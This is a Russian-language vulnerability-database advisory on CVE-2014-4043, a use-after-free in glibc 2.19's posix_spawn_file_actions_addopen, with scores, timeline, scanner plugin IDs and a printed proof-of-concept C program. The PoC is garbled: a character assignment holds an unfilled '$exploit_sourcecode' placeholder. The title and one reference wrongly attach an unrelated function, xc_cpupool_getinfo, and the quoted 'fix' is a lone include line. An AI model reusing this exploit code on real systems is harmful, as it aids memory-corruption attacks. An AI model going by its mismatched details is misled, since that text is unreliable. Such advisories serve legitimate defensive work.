GNU C Library 2.19 spawn_faction_addopen.c xc_cpupool_getinfo эскалация привилегий

| CVSS Meta Temp Score | Текущая цена эксплойта (≈) | Балл интереса CTI |
|---|---|---|
| 7.9 | $0-$5k | 0.00 |
Сводка
Была найдена уязвимость, отнесённая к категории проблематичный, в GNU C Library 2.19. Неизвестная функция файла posix/spawn_faction_addopen.c вовлечена. Выполнение манипуляции приводит к эскалация привилегий. Уязвимость зарегистрирована как CVE-2014-4043. Более того, существует эксплойт. Рекомендуется обновить затронутый компонент.
Подробности
Была найдена уязвимость, отнесённая к категории проблематичный, в GNU C Library 2.19. Неизвестная функция файла posix/spawn_faction_addopen.c вовлечена. Выполнение манипуляции приводит к эскалация привилегий. Использование CWE для объявления проблемы приводит к тому, что CWE-94. Вопрос введен в 07.02.2014. Данная уязвимость была опубликована 11.06.2014 исследователем David Reid, Alex Gaynor and and Glyph Lefkowitz с идентификатором Bug 17048 в виде Bug Report (Bugzilla). Консультация доступна для загрузки на sourceware.org. Продавец сотрудничал в координации публичного релиза.
Уязвимость зарегистрирована как CVE-2014-4043. Назначение CVE произошло 12.06.2014. Имеются технические подробности. Данная уязвимость менее популярна, чем в среднем. Более того, существует эксплойт. Эксплойт был раскрыт общественности и может быть использован. Сейчас цена на эксплойт приблизительно равна USD $0-$5k. Согласно MITRE ATT&CK, техника атаки, используемая в данной проблеме, имеет значение T1059.
Указано значение Доказательство концепции. Эксплойт можно скачать по ссылке sourceware.org. Уязвимость обрабатывалась как непубличный эксплойт нулевого дня в течение как минимум 124 дней. Как 0-day, оценочная цена на теневом рынке составляла примерно $0-$5k. Код, используемый эксплойтом, следующий:
int main() {
int res;
posix_spawn_file_actions_t fa;
posix_spawn_file_actions_init(&fa);
char *orig_path = "/tmp/afddsa";
char *path = malloc(strlen(orig_path) + 1);
strcpy(path, orig_path);
path[strlen(orig_path)] = '$exploit_sourcecode';
res = posix_spawn_file_actions_addopen(
&fa, 1, path, O_WRONLY | O_CREAT, S_IRUSR | S_IWUSR);
assert(res == 0);
memset(path, 0, strlen(orig_path));
free(path);
char *argv[] = {"/bin/echo", NULL};
pid_t pid;
res = posix_spawn(
&pid,
"/bin/echo",
&fa,
NULL,
argv,
environ
);
assert(res == 0);
int status;
wait4(pid, &status, 0, NULL);
printf("%d\n", WEXITSTATUS(status));
}
Сканер уязвимостей Nessus предоставляет плагин с идентификатором 76604. Он принадлежит семейству SuSE Local Security Checks. Он полагается на порт 0. Коммерческий сканер уязвимостей Qualys способен проверить эту проблему с помощью плагина 195576 (Ubuntu Security Notification for Eglibc Vulnerabilities (USN-2306-1)).
Переход на версию 2.20 способен решить эту проблему. Обновление уже доступно для загрузки по адресу sourceware.org. Рекомендуется обновить затронутый компонент. Для устранения уязвимости будут использованы следующие строки кода:
#include <string.h>
Данная уязвимость также присутствует в других базах данных уязвимостей: SecurityFocus (BID 68006), X-Force (93784), Secunia (SA58697), Vulnerability Center (SBV-45742) и Tenable (76604).
Продукт
Тип
Поставщик
Имя
Версия
Лицензия
Веб-сайт
- Поставщик: https://www.gnu.org/
CPE 2.3
CPE 2.2
CVSSv4
VulDB Вектор: 🔍VulDB Надёжность: 🔍
CVSSv3
VulDB Meta Base Score: 8.8VulDB Meta Temp Score: 7.9
VulDB Базовый балл: 8.8
VulDB Временная оценка: 7.9
VulDB Вектор: 🔍
VulDB Надёжность: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| Вектор | Сложность | Аутентификация | Конфиденциальность | Целостность | Доступность |
|---|---|---|---|---|---|
| Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать |
| Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать |
| Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать |
VulDB Базовый балл: 🔍
VulDB Временная оценка: 🔍
VulDB Надёжность: 🔍
NVD Базовый балл: 🔍
Эксплуатация
Класс: эскалация привилегийCWE: CWE-94 / CWE-74 / CWE-707
CAPEC: 🔍
ATT&CK: 🔍
Физический: Частично
Локальный: Да
Удалённый: Да
Доступность: 🔍
Доступ: публичный
Статус: Доказательство концепции
Автор: Alex Gaynor
Язык программирования: 🔍
Скачать: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
Прогноз цен: 🔍
Оценка текущей цены: 🔍
| 0-Day | Разблокировать | Разблокировать | Разблокировать | Разблокировать |
|---|---|---|---|---|
| Сегодня | Разблокировать | Разблокировать | Разблокировать | Разблокировать |
Nessus ID: 76604
Nessus Имя: SuSE 11.3 Security Update : glibc (SAT Patch Number 9477)
Nessus Файл: 🔍
Nessus Риск: 🔍
Nessus Семейство: 🔍
Nessus Port: 🔍
OpenVAS ID: 703169
OpenVAS Имя: Debian Security Advisory DSA 3169-1 (eglibc - security update)
OpenVAS Файл: 🔍
OpenVAS Семейство: 🔍
Qualys ID: 🔍
Qualys Имя: 🔍
Разведка угроз
Интерес: 🔍Активные акторы: 🔍
Активные группы APT: 🔍
Контрмеры
Рекомендация: ОбновлениеСтатус: 🔍
0-дневное время: 🔍
Задержка эксплуатации: 🔍
Обновление: C Library 2.20
Патч: sourceware.org
Хронология
07.02.2014 🔍11.06.2014 🔍
11.06.2014 🔍
11.06.2014 🔍
12.06.2014 🔍
13.06.2014 🔍
13.06.2014 🔍
13.06.2014 🔍
20.07.2014 🔍
11.08.2014 🔍
06.10.2014 🔍
22.06.2021 🔍
Источники
Поставщик: gnu.orgКонсультация: Bug 17048
Исследователь: David Reid, Alex Gaynor, and Glyph Lefkowitz
Статус: Подтверждённый
Подтверждение: 🔍
Скоординированный: 🔍
CVE: CVE-2014-4043 (🔍)
GCVE (CVE): GCVE-0-2014-4043
GCVE (VulDB): GCVE-100-13587
OVAL: 🔍
X-Force: 93784 - GNU C Library posix_spawn_file_actions_addopen code execution, High Risk
SecurityFocus: 68006 - GNU glibc 'xc_cpupool_getinfo()' Function Use After Free Memory Corruption Vulnerability
Secunia: 58697 - GNU C Library "posix_spawn_file_actions_addopen()" Denial of Service Vulnerabili, Less Critical
Vulnerability Center: 45742 - GNU C Library Remote Code Execution due to a Use After Free Error in \x27posix_spawn_file_actions_addopen\x27, High
scip Labs: https://www.scip.ch/en/?labs.20161013
Разное: 🔍
Смотрите также: 🔍
Вход
Создано: 13.06.2014 15:04Обновлено: 22.06.2021 20:43
Изменения: 13.06.2014 15:04 (94), 04.06.2017 10:36 (7), 22.06.2021 20:43 (3)
Завершенный: 🔍
Cache ID: 216:211:103
Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.
Комментариев пока нет. Языки: ru + be + en.
Пожалуйста, войдите в систему, чтобы прокомментировать.